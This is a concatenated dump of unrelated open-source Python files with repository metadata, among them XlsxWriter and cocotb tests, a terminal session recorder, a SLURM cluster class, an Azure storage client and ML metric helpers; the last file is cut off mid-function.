xlsxwriter/test/comparison/test_image24.py
|
dthadi3/XlsxWriter
|
f1801e82240aa9c746ce14948ef95990b83162cf
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
xlsxwriter/test/comparison/test_image24.py
|
dthadi3/XlsxWriter
|
f1801e82240aa9c746ce14948ef95990b83162cf
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2020, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('image24.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file with image(s)."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
worksheet.insert_image('B2', self.image_dir + 'black_300.png')
workbook.close()
self.assertExcelEqual()
| 23.441176 | 79 | 0.614806 |
21cf4897a8ca0a543b8347f25ac1ca64eb8d88fc
| 1,884 |
py
|
Python
|
code/town_acc.py
|
akonstodata/CT_crash_analysis
|
66a8ecce5279f4dfc9f1cc3766a00573229812ca
|
[
"MIT"
] | 1 |
2020-10-04T20:54:25.000Z
|
2020-10-04T20:54:25.000Z
|
code/town_acc.py
|
akonstodata/CT_crash_analysis
|
66a8ecce5279f4dfc9f1cc3766a00573229812ca
|
[
"MIT"
] | null | null | null |
code/town_acc.py
|
akonstodata/CT_crash_analysis
|
66a8ecce5279f4dfc9f1cc3766a00573229812ca
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
This set of functions is used to create a town class
CT Crash data analysis
@author: Anna Konstorum (konstorum.anna@gmail.com)
"""
import plot_results
class town_acc():
"""Analyzing I-84 CT crash data by town"""
#import numpy as np
def __init__(self,town,full_data,exit_mile,town_mile):
"""Initialize town and full data repository"""
self.town = town
self.full_data = full_data
self.exit_mile = exit_mile
self.town_mile = town_mile
def get_town_data(self):
"""Subset full data by town if requested"""
full_data_crash = self.full_data
if self.town == 'All':
town_data_subset = full_data_crash
else:
town_data_subset = full_data_crash[full_data_crash["Town_Name"]==self.town]
return(town_data_subset)
def get_weekdays(self,town_data_subset):
"""Subset for just weekdays"""
town_data_weekday = town_data_subset[(town_data_subset["Day_of_the_Week_Text_Format"]!="Saturday")
& (town_data_subset["Day_of_the_Week_Text_Format"]!="Sunday")]
town_data_weekday = town_data_weekday.reset_index()
return town_data_weekday
def get_rush_hour(self,town_data_subset,morn_eve):
if morn_eve == "morning":
start_time="06:00:00"
end_time="09:00:00"
else:
start_time = "16:00:00"
end_time = "19:00:00"
town_data_rush_hour = town_data_subset[town_data_subset.final_time.dt.strftime("%H:%M:%S").between(start_time,end_time)]
return town_data_rush_hour
def plot_town_data(self,town_data_subset, y_max, y_min,title_out):
plot_results.plot_accidents_bytown(self.exit_mile, self.town_mile,self.town,town_data_subset, y_max, y_min, title_out)
| 36.941176 | 129 | 0.656582 |
4d4efa71cbcf08423c785686d0bca830d89b7738
| 631 |
py
|
Python
|
examples/infinity_feedliker.py
|
pierfani/instabot
|
2eb724e2f7e7e14df67098c71a871f036574e33c
|
[
"Apache-2.0"
] | 4 |
2019-08-17T01:27:20.000Z
|
2020-01-08T12:01:34.000Z
|
examples/infinity_feedliker.py
|
pierfani/instabot
|
2eb724e2f7e7e14df67098c71a871f036574e33c
|
[
"Apache-2.0"
] | 4 |
2019-02-25T08:48:07.000Z
|
2019-03-07T17:06:15.000Z
|
examples/infinity_feedliker.py
|
pierfani/instabot
|
2eb724e2f7e7e14df67098c71a871f036574e33c
|
[
"Apache-2.0"
] | 5 |
2019-04-10T04:53:14.000Z
|
2020-05-17T09:10:06.000Z
|
"""
instabot example
Workflow:
Like rescent medias from your timeline feed.
"""
import argparse
import os
import sys
import time
sys.path.append(os.path.join(sys.path[0], '../'))
from instabot import Bot
parser = argparse.ArgumentParser(add_help=True)
parser.add_argument('-u', type=str, help="username")
parser.add_argument('-p', type=str, help="password")
parser.add_argument('-proxy', type=str, help="proxy")
args = parser.parse_args()
bot = Bot()
bot.login(username=args.u, password=args.p,
proxy=args.proxy)
wait = 5 * 60 # in seconds
while True:
bot.like_timeline()
time.sleep(wait)
| 20.354839 | 53 | 0.690967 |
2249b1559381e099d154e526407cdd5dc76d60b3
| 1,818 |
py
|
Python
|
data/p2DJ/New/program/cirq/startCirq168.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p2DJ/New/program/cirq/startCirq168.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p2DJ/New/program/cirq/startCirq168.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=2
# total number=10
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
from cirq.contrib.svg import SVGCircuit
# Symbols for the rotation angles in the QAOA circuit.
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=1
c.append(cirq.Y.on(input_qubit[1])) # number=2
c.append(cirq.Y.on(input_qubit[1])) # number=4
c.append(cirq.Y.on(input_qubit[1])) # number=3
c.append(cirq.rx(2.0860175219836226).on(input_qubit[1])) # number=7
c.append(cirq.X.on(input_qubit[0])) # number=5
c.append(cirq.X.on(input_qubit[0])) # number=6
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=8
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=9
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq168.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close()
| 28.40625 | 77 | 0.694169 |
5984f249444dd00fb8b3ee4bf26f283c9a91a344
| 7,930 |
py
|
Python
|
termrec/__init__.py
|
donno2048/termrec
|
114b99e5e0c486c0ea3334b138c35a5bfc992440
|
[
"MIT"
] | 4 |
2021-12-09T17:30:42.000Z
|
2021-12-30T09:35:52.000Z
|
termrec/__init__.py
|
donno2048/termrec
|
114b99e5e0c486c0ea3334b138c35a5bfc992440
|
[
"MIT"
] | null | null | null |
termrec/__init__.py
|
donno2048/termrec
|
114b99e5e0c486c0ea3334b138c35a5bfc992440
|
[
"MIT"
] | null | null | null |
from json import loads, dumps
from codecs import getincrementaldecoder
from time import time
from select import select
from os import read, environ, get_terminal_size, isatty, write, execvpe, pipe, O_NONBLOCK, waitpid, close
from array import array
from fcntl import ioctl, fcntl, F_GETFL, F_SETFL
from signal import signal, SIGCHLD, SIGHUP, SIGTERM, SIGQUIT, set_wakeup_fd, SIGWINCH
from termios import error, TCSAFLUSH, tcgetattr, tcsetattr, TIOCGWINSZ, TIOCSWINSZ
from multiprocessing import Process, Queue
WIDTH, HEIGHT = get_terminal_size()
ENV = {'SHELL': environ.get('SHELL'), 'TERM': environ.get('TERM')}
class writer():
def __init__(self, path, header): self.path, self.decstdin, self.decstdout, self.header = path, getincrementaldecoder('UTF-8')('replace'), getincrementaldecoder('UTF-8')('replace'), header
def __enter__(self):
self.file = open(self.path, mode='w', buffering=1)
self.write_line(self.header)
return self
def __exit__(self, exc_type, exc_value, exc_traceback): self.file.close()
def write_event(self, ts):
ts, etype, data = ts
ts = round(ts, 6)
if etype == 'o':
if type(data) == str: data = data.encode(encoding='utf-8', errors='strict')
self.write_line([ts, etype, self.decstdout.decode(data)])
elif etype == 'i':
if type(data) == str: data = data.encode(encoding='utf-8', errors='strict')
self.write_line([ts, etype, self.decstdin.decode(data)])
else: self.write_line([ts, etype, data])
def write_stdout(self, ts, data): self.write_event(ts, 'o', data)
def write_stdin(self, ts, data): self.write_event(ts, 'i', data)
def write_line(self, obj): self.file.write(dumps(obj, ensure_ascii=False, indent=None, separators=(', ', ': ')) + '\n')
def write_json(path, header, queue):
with writer(path, header) as w:
for event in iter(queue.get, None): w.write_event(event)
class async_writer():
def __init__(self, path, metadata): self.path, self.metadata, self.queue = path, metadata, Queue()
def __enter__(self):
self.process = Process(target=write_json, args=(self.path, self.metadata, self.queue))
self.process.start()
self.start_time = time()
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
self.queue.put(None)
self.process.join()
def write_stdin(self, data): self.queue.put([time() - self.start_time, 'i', data])
def write_stdout(self, data): self.queue.put([time() - self.start_time, 'o', data])
class raw():
def __init__(self, fd): self.fd, self.restore = fd, False
def __enter__(self):
try:
self.mode = tcgetattr(self.fd)
__import__("tty").setraw(self.fd)
self.restore = True
except error: pass
def __exit__(self, type, value, traceback):
if self.restore: tcsetattr(self.fd, TCSAFLUSH, self.mode)
def record(command, writer):
master_fd = None
def _set_pty_size():
if isatty(1):
buf = array('h', [0, 0, 0, 0])
ioctl(1, TIOCGWINSZ, buf, True)
else: buf = array('h', [24, 80, 0, 0])
ioctl(master_fd, TIOCSWINSZ, buf)
def _write_stdout(data): write(1, data)
def _handle_master_read(data):
writer.write_stdout(data)
_write_stdout(data)
def _write_master(data):
while data: data = data[write(master_fd, data):]
def _handle_stdin_read(data): _write_master(data) #;writer.write_stdin(data)
def _signals(signal_list): return [(sig, signal(sig, handler)) for sig, handler in signal_list]
def _copy(signal_fd):
fds = [master_fd, 0, signal_fd]
while True:
try: rfds, wfds, xfds = select(fds, [], [])
except OSError as e:
if e.errno == 4: continue
if master_fd in rfds:
data = read(master_fd, 1024)
if not data: fds.remove(master_fd)
else: _handle_master_read(data)
if 0 in rfds:
data = read(0, 1024)
if not data: fds.remove(0)
else: _handle_stdin_read(data)
if signal_fd in rfds:
data = read(signal_fd, 1024)
if data:
signals = __import__("struct").unpack('%uB' % len(data), data)
for sig in signals:
if sig in [SIGCHLD, SIGHUP, SIGTERM, SIGQUIT]:
close(master_fd)
return
elif sig == SIGWINCH: _set_pty_size()
pid, master_fd = __import__("pty").fork()
if not pid: execvpe(command[0], command, environ)
pipe_r, pipe_w = pipe()
flags = fcntl(pipe_w, F_SETFL, fcntl(pipe_w, F_GETFL, 0) | O_NONBLOCK)
set_wakeup_fd(pipe_w)
old_handlers = _signals(map(lambda s: (s, lambda signal, frame: None), [SIGWINCH, SIGCHLD, SIGHUP, SIGTERM, SIGQUIT]))
_set_pty_size()
with raw(0):
try: _copy(pipe_r)
except (IOError, OSError): pass
_signals(old_handlers)
waitpid(pid, 0)
class Cast:
def __init__(self, f, header): self.version, self.__file, self.v2_header, self.idle_time_limit = 2, f, header, header.get('idle_time_limit')
def events(self):
for line in self.__file: yield loads(line)
def stdout_events(self):
for time, type, data in self.events():
if type == 'o': yield [time, type, data]
def file2cast(header, f): return Cast(f, header)
class open_file():
def __init__(self, first_line, file): self.first_line, self.file = first_line, file
def __enter__(self): return file2cast(loads(self.first_line), self.file)
def __exit__(self, exc_type, exc_value, exc_traceback): self.file.close()
class file():
def __init__(self, path): self.path = path
def __enter__(self):
self.file = open(self.path, mode='rt', encoding='utf-8')
self.context = open_file(self.file.readline(), self.file)
return self.context.__enter__()
def __exit__(self, exc_type, exc_value, exc_traceback): self.context.__exit__(exc_type, exc_value, exc_traceback)
def play(cast):
try:
std = open('/dev/tty')
with raw(std.fileno()): stdin = std
except Exception: stdin = None
base_time, keyboard_interrupt, paused, pause_time, not_broke = time(), False, False, None, True
for t, _type, text in cast.stdout_events():
delay = t - (time() - base_time)
while stdin and not keyboard_interrupt and delay > 0:
if paused:
while not_broke:
fi, not_broke = stdin.fileno(), False
terminal = read(fi, 1024) if fi in select([fi], [], [], 1000)[0] else b''
if 3 in terminal: keyboard_interrupt = True
elif 32 in terminal: paused, base_time = False, base_time + (time() - pause_time)
elif 46 in terminal:
delay, pause_time = 0, time()
base_time = pause_time - t
else: not_broke = True
else:
fi = stdin.fileno()
terminal = read(fi, 1024) if fi in select([fi], [], [], delay)[0] else b''
if not terminal: break
elif 3 in terminal:
keyboard_interrupt = True
break
elif 32 in terminal:
paused, pause_time = True, time()
delay += pause_time - t - base_time
if keyboard_interrupt: break
__import__("sys").stdout.write(text)
__import__("sys").stdout.flush()
def main_rec(path, command = None):
with async_writer(path, {'width': WIDTH, 'height': HEIGHT, 'timestamp': int(time()), 'env': ENV}) as w: record(['sh', '-c', command or environ.get('SHELL') or 'sh'], w)
def main_play(path):
with file(path) as a: play(a)
| 48.353659 | 192 | 0.607692 |
abc031ccd2eafa2cf991135736365b9631602198
| 2,083 |
py
|
Python
|
krake/krake/controller/scheduler/__main__.py
|
rak-n-rok/Krake
|
2f0d4a382b99639e2c1149ee8593a9bb589d2d3f
|
[
"Apache-2.0"
] | 1 |
2020-05-29T08:43:32.000Z
|
2020-05-29T08:43:32.000Z
|
krake/krake/controller/scheduler/__main__.py
|
rak-n-rok/Krake
|
2f0d4a382b99639e2c1149ee8593a9bb589d2d3f
|
[
"Apache-2.0"
] | null | null | null |
krake/krake/controller/scheduler/__main__.py
|
rak-n-rok/Krake
|
2f0d4a382b99639e2c1149ee8593a9bb589d2d3f
|
[
"Apache-2.0"
] | 1 |
2019-11-19T13:39:02.000Z
|
2019-11-19T13:39:02.000Z
|
"""Module for Krake controller responsible for binding Krake
applications to specific backends and entry point of Krake scheduler.
.. code:: bash
python -m krake.controller.scheduler --help
Configuration is loaded from the ``controllers.scheduler`` section:
.. code:: yaml
api_endpoint: http://localhost:8080
worker_count: 5
debounce: 1
reschedule_after: 60
stickiness: 0.1
tls:
enabled: false
client_ca: tmp/pki/ca.pem
client_cert: tmp/pki/system:gc.pem
client_key: tmp/pki/system:gc-key.pem
log:
...
"""
import logging
import pprint
from argparse import ArgumentParser
from krake import (
setup_logging,
search_config,
ConfigurationOptionMapper,
load_yaml_config,
)
from krake.data.config import SchedulerConfiguration
from krake.utils import KrakeArgumentFormatter
from ...controller import create_ssl_context, run
from .scheduler import Scheduler
logger = logging.getLogger("krake.controller.scheduler")
parser = ArgumentParser(
description="Krake scheduler", formatter_class=KrakeArgumentFormatter
)
parser.add_argument("-c", "--config", type=str, help="Path to configuration YAML file")
mapper = ConfigurationOptionMapper(SchedulerConfiguration)
mapper.add_arguments(parser)
def main(config):
setup_logging(config.log)
logger.debug("Krake Scheduler configuration settings:\n %s", pprint.pformat(config))
tls_config = config.tls
ssl_context = create_ssl_context(tls_config)
logger.debug("TLS is %s", "enabled" if ssl_context else "disabled")
scheduler = Scheduler(
api_endpoint=config.api_endpoint,
worker_count=config.worker_count,
ssl_context=ssl_context,
debounce=config.debounce,
reschedule_after=config.reschedule_after,
stickiness=config.stickiness,
)
run(scheduler)
if __name__ == "__main__":
args = vars(parser.parse_args())
config = load_yaml_config(args["config"] or search_config("scheduler.yaml"))
scheduler_config = mapper.merge(config, args)
main(scheduler_config)
| 25.716049 | 88 | 0.731637 |
b45e8402c4e18141dc25b2110203e7593a2d182c
| 6,021 |
py
|
Python
|
azure-mgmt-storage/azure/mgmt/storage/storage_management_client.py
|
Berryliao84/Python-Azure
|
a96ed6e8bbf4290372980a2919b31110da90b164
|
[
"MIT"
] | 1 |
2017-10-29T15:14:35.000Z
|
2017-10-29T15:14:35.000Z
|
azure-mgmt-storage/azure/mgmt/storage/storage_management_client.py
|
Berryliao84/Python-Azure
|
a96ed6e8bbf4290372980a2919b31110da90b164
|
[
"MIT"
] | null | null | null |
azure-mgmt-storage/azure/mgmt/storage/storage_management_client.py
|
Berryliao84/Python-Azure
|
a96ed6e8bbf4290372980a2919b31110da90b164
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.service_client import ServiceClient
from msrest import Serializer, Deserializer
from msrestazure import AzureConfiguration
from .version import VERSION
from .operations.storage_accounts_operations import StorageAccountsOperations
from .operations.usage_operations import UsageOperations
from . import models
class StorageManagementClientConfiguration(AzureConfiguration):
"""Configuration for StorageManagementClient
Note that all parameters used to create this instance are saved as instance
attributes.
:param credentials: Credentials needed for the client to connect to Azure.
:type credentials: :mod:`A msrestazure Credentials
object<msrestazure.azure_active_directory>`
:param subscription_id: Gets subscription credentials which uniquely
identify the Microsoft Azure subscription. The subscription ID forms part
of the URI for every service call.
:type subscription_id: str
:param api_version: Client Api Version.
:type api_version: str
:param accept_language: Gets or sets the preferred language for the
response.
:type accept_language: str
:param long_running_operation_retry_timeout: Gets or sets the retry
timeout in seconds for Long Running Operations. Default value is 30.
:type long_running_operation_retry_timeout: int
:param generate_client_request_id: When set to true a unique
x-ms-client-request-id value is generated and included in each request.
Default is true.
:type generate_client_request_id: bool
:param str base_url: Service URL
:param str filepath: Existing config
"""
def __init__(
self, credentials, subscription_id, api_version='2016-01-01', accept_language='en-US', long_running_operation_retry_timeout=30, generate_client_request_id=True, base_url=None, filepath=None):
if credentials is None:
raise ValueError("Parameter 'credentials' must not be None.")
if subscription_id is None:
raise ValueError("Parameter 'subscription_id' must not be None.")
if not isinstance(subscription_id, str):
raise TypeError("Parameter 'subscription_id' must be str.")
if api_version is not None and not isinstance(api_version, str):
raise TypeError("Optional parameter 'api_version' must be str.")
if accept_language is not None and not isinstance(accept_language, str):
raise TypeError("Optional parameter 'accept_language' must be str.")
if not base_url:
base_url = 'https://management.azure.com'
super(StorageManagementClientConfiguration, self).__init__(base_url, filepath)
self.add_user_agent('storagemanagementclient/{}'.format(VERSION))
self.add_user_agent('Azure-SDK-For-Python')
self.credentials = credentials
self.subscription_id = subscription_id
self.api_version = api_version
self.accept_language = accept_language
self.long_running_operation_retry_timeout = long_running_operation_retry_timeout
self.generate_client_request_id = generate_client_request_id
class StorageManagementClient(object):
"""The Storage Management Client.
:ivar config: Configuration for client.
:vartype config: StorageManagementClientConfiguration
:ivar storage_accounts: StorageAccounts operations
:vartype storage_accounts: .operations.StorageAccountsOperations
:ivar usage: Usage operations
:vartype usage: .operations.UsageOperations
:param credentials: Credentials needed for the client to connect to Azure.
:type credentials: :mod:`A msrestazure Credentials
object<msrestazure.azure_active_directory>`
:param subscription_id: Gets subscription credentials which uniquely
identify the Microsoft Azure subscription. The subscription ID forms part
of the URI for every service call.
:type subscription_id: str
:param api_version: Client Api Version.
:type api_version: str
:param accept_language: Gets or sets the preferred language for the
response.
:type accept_language: str
:param long_running_operation_retry_timeout: Gets or sets the retry
timeout in seconds for Long Running Operations. Default value is 30.
:type long_running_operation_retry_timeout: int
:param generate_client_request_id: When set to true a unique
x-ms-client-request-id value is generated and included in each request.
Default is true.
:type generate_client_request_id: bool
:param str base_url: Service URL
:param str filepath: Existing config
"""
def __init__(
self, credentials, subscription_id, api_version='2016-01-01', accept_language='en-US', long_running_operation_retry_timeout=30, generate_client_request_id=True, base_url=None, filepath=None):
self.config = StorageManagementClientConfiguration(credentials, subscription_id, api_version, accept_language, long_running_operation_retry_timeout, generate_client_request_id, base_url, filepath)
self._client = ServiceClient(self.config.credentials, self.config)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self.storage_accounts = StorageAccountsOperations(
self._client, self.config, self._serialize, self._deserialize)
self.usage = UsageOperations(
self._client, self.config, self._serialize, self._deserialize)
| 47.785714 | 204 | 0.733599 |
5942c34071dcb91ebe968c06a082520f09fab9f9
| 4,823 |
py
|
Python
|
dask_jobqueue/slurm.py
|
jennirinker/dask-jobqueue
|
975425e2968873310bec030a761c1db99e6c7ec6
|
[
"BSD-3-Clause"
] | null | null | null |
dask_jobqueue/slurm.py
|
jennirinker/dask-jobqueue
|
975425e2968873310bec030a761c1db99e6c7ec6
|
[
"BSD-3-Clause"
] | null | null | null |
dask_jobqueue/slurm.py
|
jennirinker/dask-jobqueue
|
975425e2968873310bec030a761c1db99e6c7ec6
|
[
"BSD-3-Clause"
] | null | null | null |
import logging
import math
import dask
from .core import JobQueueCluster, docstrings
logger = logging.getLogger(__name__)
class SLURMCluster(JobQueueCluster):
__doc__ = docstrings.with_indents(
""" Launch Dask on a SLURM cluster
Parameters
----------
queue : str
Destination queue for each worker job. Passed to `#SBATCH -p` option.
project : str
Accounting string associated with each worker job. Passed to `#SBATCH -A` option.
walltime : str
Walltime for each worker job.
job_cpu : int
Number of cpu to book in SLURM, if None, defaults to worker `threads * processes`
job_mem : str
Amount of memory to request in SLURM. If None, defaults to worker
processes * memory
job_extra : list
List of other Slurm options, for example -j oe. Each option will be prepended with the #SBATCH prefix.
%(JobQueueCluster.parameters)s
Examples
--------
>>> from dask_jobqueue import SLURMCluster
>>> cluster = SLURMCluster(processes=6, cores=24, memory="120GB",
env_extra=['export LANG="en_US.utf8"',
'export LANGUAGE="en_US.utf8"',
'export LC_ALL="en_US.utf8"'])
>>> cluster.scale(10) # this may take a few seconds to launch
>>> from dask.distributed import Client
>>> client = Client(cluster)
This also works with adaptive clusters. This automatically launches and kill workers based on load.
>>> cluster.adapt()
""",
4,
)
# Override class variables
submit_command = "sbatch"
cancel_command = "scancel"
def __init__(
self,
queue=None,
project=None,
walltime=None,
job_cpu=None,
job_mem=None,
job_extra=None,
config_name="slurm",
**kwargs
):
if queue is None:
queue = dask.config.get("jobqueue.%s.queue" % config_name)
if project is None:
project = dask.config.get("jobqueue.%s.project" % config_name)
if walltime is None:
walltime = dask.config.get("jobqueue.%s.walltime" % config_name)
if job_cpu is None:
job_cpu = dask.config.get("jobqueue.%s.job-cpu" % config_name)
if job_mem is None:
job_mem = dask.config.get("jobqueue.%s.job-mem" % config_name)
if job_extra is None:
job_extra = dask.config.get("jobqueue.%s.job-extra" % config_name)
super().__init__(config_name=config_name, **kwargs)
# Always ask for only one task
header_lines = []
# SLURM header build
if self.name is not None:
header_lines.append("#SBATCH -J %s" % self.name)
if self.log_directory is not None:
header_lines.append(
"#SBATCH -e %s/%s-%%J.err" % (self.log_directory, self.name or "worker")
)
header_lines.append(
"#SBATCH -o %s/%s-%%J.out" % (self.log_directory, self.name or "worker")
)
if queue is not None:
header_lines.append("#SBATCH -p %s" % queue)
if project is not None:
header_lines.append("#SBATCH -A %s" % project)
# Init resources, always 1 task,
# and then number of cpu is processes * threads if not set
header_lines.append("#SBATCH -n 1")
header_lines.append(
"#SBATCH --cpus-per-task=%d" % (job_cpu or self.worker_cores)
)
# Memory
memory = job_mem
if job_mem is None:
memory = slurm_format_bytes_ceil(self.worker_memory)
if memory is not None:
header_lines.append("#SBATCH --mem=%s" % memory)
if walltime is not None:
header_lines.append("#SBATCH -t %s" % walltime)
header_lines.extend(["#SBATCH %s" % arg for arg in job_extra])
header_lines.append("JOB_ID=${SLURM_JOB_ID%;*}")
# Declare class attribute that shall be overridden
self.job_header = "\n".join(header_lines)
logger.debug("Job script: \n %s" % self.job_script())
def slurm_format_bytes_ceil(n):
""" Format bytes as text.
SLURM expects KiB, MiB or Gib, but names it KB, MB, GB. SLURM does not handle Bytes, only starts at KB.
>>> slurm_format_bytes_ceil(1)
'1K'
>>> slurm_format_bytes_ceil(1234)
'2K'
>>> slurm_format_bytes_ceil(12345678)
'13M'
>>> slurm_format_bytes_ceil(1234567890)
'2G'
>>> slurm_format_bytes_ceil(15000000000)
'14G'
"""
if n >= (1024 ** 3):
return "%dG" % math.ceil(n / (1024 ** 3))
if n >= (1024 ** 2):
return "%dM" % math.ceil(n / (1024 ** 2))
if n >= 1024:
return "%dK" % math.ceil(n / 1024)
return "1K" % n
| 33.034247 | 110 | 0.587394 |
b3833ae014e13b485aa7a5013a7d09ed4d273567
| 303 |
py
|
Python
|
data/multilingual/Latn.QVA/Mono_12/pdf_to_json_test_Latn.QVA_Mono_12.py
|
antoinecarme/pdf_to_json_tests
|
d57a024fde862e698d916a1178f285883d7a3b2f
|
[
"BSD-3-Clause"
] | 1 |
2021-09-19T19:47:35.000Z
|
2021-09-19T19:47:35.000Z
|
data/multilingual/Latn.QVA/Mono_12/pdf_to_json_test_Latn.QVA_Mono_12.py
|
antoinecarme/pdf_to_json_tests
|
d57a024fde862e698d916a1178f285883d7a3b2f
|
[
"BSD-3-Clause"
] | null | null | null |
data/multilingual/Latn.QVA/Mono_12/pdf_to_json_test_Latn.QVA_Mono_12.py
|
antoinecarme/pdf_to_json_tests
|
d57a024fde862e698d916a1178f285883d7a3b2f
|
[
"BSD-3-Clause"
] | null | null | null |
import pdf_to_json as p2j
import json
url = "file:data/multilingual/Latn.QVA/Mono_12/udhr_Latn.QVA_Mono_12.pdf"
lConverter = p2j.pdf_to_json.pdf_to_json_converter()
lConverter.mImageHashOnly = True
lDict = lConverter.convert(url)
print(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))
| 30.3 | 73 | 0.811881 |
a8be862da4960f10719473d21eb7fdd4528174eb
| 1,667 |
py
|
Python
|
xschem/fractional_n_divider/tests/mash_mod/test_mash_mod_coverage.py
|
yrrapt/caravel_amsat_txrx_ic
|
53bef4537447a623f93772092daeac67c4cb3d45
|
[
"Apache-2.0"
] | 15 |
2020-12-13T12:33:15.000Z
|
2022-02-17T18:09:25.000Z
|
xschem/fractional_n_divider/tests/mash_mod/test_mash_mod_coverage.py
|
yrrapt/caravel_amsat_txrx_ic
|
53bef4537447a623f93772092daeac67c4cb3d45
|
[
"Apache-2.0"
] | null | null | null |
xschem/fractional_n_divider/tests/mash_mod/test_mash_mod_coverage.py
|
yrrapt/caravel_amsat_txrx_ic
|
53bef4537447a623f93772092daeac67c4cb3d45
|
[
"Apache-2.0"
] | 6 |
2021-01-02T05:52:21.000Z
|
2022-03-28T06:55:07.000Z
|
import cocotb
from cocotb.triggers import RisingEdge, ReadOnly
from cocotb_coverage.coverage import *
# auxiliary relation function to define bins matching within a range
range_relation = lambda val_, bin_ : bin_[0] <= val_ <= bin_[1]
class MASHModStatus():
"""
Object representing modulator status
"""
def __init__(self, dut):
self.dut = dut
# @cocotb.coroutine
def update(self):
self.data_in = int(self.dut.data_in.value)
self.data_out = int(self.dut.data_out)
#functional coverage - check if all FIFO states have been reached
#and check if read or write operation performed in every FIFO state
MASHModCoverage = coverage_section (
CoverPoint(
name = "top.data_in",
xf = lambda dut, status, input_data : status.data_in,
rel = range_relation,
bins = [(0,int(2**16*1/3)-1), (int(2**16*1/3),int(2**16*2/3)-1), (int(2**16*2/3),int(2**16-1))],
bins_labels = ["low", "med", "high"]
),
CoverPoint(
name = "top.data_out",
xf = lambda dut, status, input_data : status.data_out,
rel = range_relation,
bins = [(0,int(2**3*1/3)-1), (int(2**3*1/3),int(2**3*2/3)-1), (int(2**3*2/3),int(2**3-1))],
bins_labels = ["low", "med", "high"]
)
)
# procedure of processing data
# coverage sampled here - at each function call
@MASHModCoverage
async def process_data(dut, status, input_data):
# provide new data and read old
dut.data_in <= input_data
await RisingEdge(dut.clk)
output_data = int(dut.data_out)
# convert to signed
if output_data > 2**2:
output_data -= 2**3
return output_data
| 30.309091 | 104 | 0.632274 |
784e349e12c5770fb9d646442a576e5e8958cbbe
| 2,272 |
py
|
Python
|
mltb/metrics.py
|
ddxgz/mltb
|
a265bf4b72cd3c51b34c2a0603bd9d0def6f86db
|
[
"MIT"
] | 2 |
2020-08-07T13:56:48.000Z
|
2020-09-20T11:24:06.000Z
|
mltb/metrics.py
|
ddxgz/mltoolbox
|
a265bf4b72cd3c51b34c2a0603bd9d0def6f86db
|
[
"MIT"
] | null | null | null |
mltb/metrics.py
|
ddxgz/mltoolbox
|
a265bf4b72cd3c51b34c2a0603bd9d0def6f86db
|
[
"MIT"
] | 1 |
2020-11-07T14:04:06.000Z
|
2020-11-07T14:04:06.000Z
|
import numpy as np
import pandas as pd
from sklearn import metrics
from typing import List
def rmse_cal(y_true, y_pred, log: bool=False, negate=False):
if log:
# to add 1 in case the predicted values are not positive
y_true = np.log1p(y_true)
y_pred = np.log1p(y_pred)
# return -np.sqrt(mean_squared_error(y_true, y_pred))
if negate:
return -np.sqrt(np.sum(np.square(y_pred - y_true)) / len(y_pred))
return np.sqrt(np.sum(np.square(y_pred - y_true)) / len(y_pred))
# if the custom score function is a loss (greater_is_better=False), the output
# of the python function is negated by the scorer object, conforming to the
# cross validation convention that scorers return higher values for better
# models.
# rmsle_cal = partial(rmse_cal, True)
RMSE = metrics.make_scorer(rmse_cal, log=False, greater_is_better=False)
RMSLE = metrics.make_scorer(rmse_cal, log=True, greater_is_better=False)
def classification_report_avg(y_true, y_pred, cols_avg: List[str] = None):
if isinstance(y_true, list):
y_true = np.array(y_true)
if isinstance(y_pred, list):
y_pred = np.array(y_pred)
report = metrics.classification_report(
y_true, y_pred, output_dict=True, zero_division=0)
df_report = pd.DataFrame(report).transpose()
if cols_avg is not None:
cols = cols_avg
else:
cols = ['micro avg', 'macro avg', 'weighted avg', 'samples avg']
return df_report.loc[cols, ]
def best_fbeta_score(true_labels, predictions, beta=1, average='micro', **kwargs):
